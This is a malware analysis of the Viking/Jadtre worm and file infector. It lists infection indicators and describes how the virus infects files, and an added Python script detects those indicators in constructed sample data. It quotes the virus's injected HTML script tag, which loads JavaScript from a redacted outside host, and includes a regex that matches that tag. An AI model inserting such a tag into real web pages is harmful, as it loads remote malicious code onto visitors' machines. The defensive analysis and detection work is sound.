Viking/Jadtre is a combination of a worm and a file-infector virus that spreads through removable devices and network shares. It infects executable and HTML files and dramatically slows down the infected computer's performance.

Removal instructions:

Analyzed By

Dumitru-Bogdan Prelipcean, virus researcher; Andrei Nacu, virus researcher

Technical Description:

You may be infected with Viking/Jadtre if:

- there is a hidden autorun.inf created on a removable device, alongside a hidden recycle.{random-string} folder and another hidden folder with a random name.

- the hosts file has been modified without the user's consent:

    - the hosts file does not include its original comments.

    - the hosts file has been emptied of all the IPs you may have added to it, other than the localhost IP.

Viking/Jadtre infects executable files by creating its own section and modifying the entry point so that the virus is executed first, allowing itself to spread. After that, the executable is run normally (except for when it is an installer, because some versions of Viking/Jadtre compromise installers).

Some versions of Viking/Jadtre also infect HTML files by appending a malicious script tag:

<script language=javascript src=http://www.ha[removed].com/js/w.js></script>

The virus deletes DLLs from the system32 folder and copies itself in their place using the same name (e.g. appmgmts.dll, qmgr.dll, ntmssvc.dll), and sometimes creates a DLL called dmutilio.dll. It also creates .sys files in system32 with random names and registers them as services.
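The indicators listed above (hidden autorun.inf and recycle.{random} folder on a removable drive, a hosts file stripped of its comments and custom entries, and the appended script tag in HTML files) can be checked mechanically. The script below is an added example written for this page, not Bitdefender's own tooling. It runs on constructed sample data embedded inline; the hosts samples, the drive listing and the script URL (with the domain left redacted, as in the report) are assumptions, and the list of hostnames the administrator added on purpose is assumed to be maintained out of band.

```python
"""Checks for the Viking/Jadtre infection indicators described in the report.
Added example on constructed data; not the vendor's own code."""
import re
from typing import List, Tuple


# --- Indicator 1: hosts file tampering --------------------------------------

def hosts_findings(hosts_text: str, admin_entries: List[str]) -> List[str]:
    """Report a hosts file that lost its stock comments or the entries the
    administrator knows were added (admin_entries is assumed to come from
    config management). The virus keeps only the localhost mapping."""
    findings = []
    lines = hosts_text.splitlines()
    if not any(line.lstrip().startswith("#") for line in lines):
        findings.append("hosts: no comment lines (stock file comments are missing)")
    present = set()
    for line in lines:
        fields = line.split("#", 1)[0].split()      # drop trailing comments
        if len(fields) >= 2:
            present.update(h for h in fields[1:] if h.lower() != "localhost")
    for name in admin_entries:
        if name not in present:
            findings.append(f"hosts: expected entry '{name}' is gone")
    return findings


# --- Indicator 2: script tag appended to HTML files -------------------------

# The report redacts the domain, so only the tag shape and the script path are
# matched. \s* before src= also catches the form with the space dropped.
INJECTED_SCRIPT_RE = re.compile(
    r"<script\s+language=javascript\s*src=(?P<src>[^\s>]+)\s*>\s*</script>",
    re.IGNORECASE,
)


def html_findings(html: str) -> List[str]:
    findings = []
    for m in INJECTED_SCRIPT_RE.finditer(html):
        src = m.group("src").strip("\"'")
        if src.lower().endswith("/js/w.js"):
            # The virus appends the tag, so it normally sits after </html>.
            where = ("appended after </html>" if "</html>" in html[: m.start()].lower()
                     else "inside document")
            findings.append(f"html: injected script {src} ({where})")
    return findings


# --- Indicator 3: hidden files in a removable drive root --------------------

RECYCLE_DIR_RE = re.compile(r"^recycle\.[^\\/]+$", re.IGNORECASE)


def removable_findings(root_listing: List[Tuple[str, bool, bool]]) -> List[str]:
    """root_listing holds (name, is_dir, is_hidden) tuples for the drive root.
    Constructed here; on a live Windows host the hidden bit is available via
    os.stat(path).st_file_attributes & stat.FILE_ATTRIBUTE_HIDDEN."""
    findings = []
    for name, is_dir, hidden in root_listing:
        if not hidden:
            continue
        if not is_dir and name.lower() == "autorun.inf":
            findings.append("removable: hidden autorun.inf in drive root")
        elif is_dir and RECYCLE_DIR_RE.match(name):
            findings.append(f"removable: hidden folder {name} (recycle.<random> pattern)")
        elif is_dir:
            findings.append(f"removable: other hidden folder {name} (review manually)")
    return findings


# --- Constructed samples ------------------------------------------------------

CLEAN_HOSTS = ("# Copyright (c) 1993-2009 Microsoft Corp.\n#\n"
               "# This is a sample HOSTS file.\n"
               "127.0.0.1 localhost\n10.0.0.5 intranet.example\n")
TAMPERED_HOSTS = "127.0.0.1 localhost\n"            # comments and custom entry gone
ADMIN_ENTRIES = ["intranet.example"]
CLEAN_HTML = "<html><body>hello</body></html>\n"
INFECTED_HTML = CLEAN_HTML + (
    "<script language=javascript src=http://www.ha-REDACTED-.com/js/w.js></script>")
DRIVE_ROOT = [("autorun.inf", False, True), ("recycle.A1b2C3", True, True),
              ("photos", True, False), ("x9kq2", True, True)]


def scan_all() -> List[str]:
    return (hosts_findings(TAMPERED_HOSTS, ADMIN_ENTRIES)
            + html_findings(INFECTED_HTML) + removable_findings(DRIVE_ROOT))


if __name__ == "__main__":
    for finding in scan_all():
        print(finding)
```

A clean hosts file and a clean HTML file produce no findings; the tampered samples produce one line per indicator, which makes the functions easy to wire into an existing endpoint check.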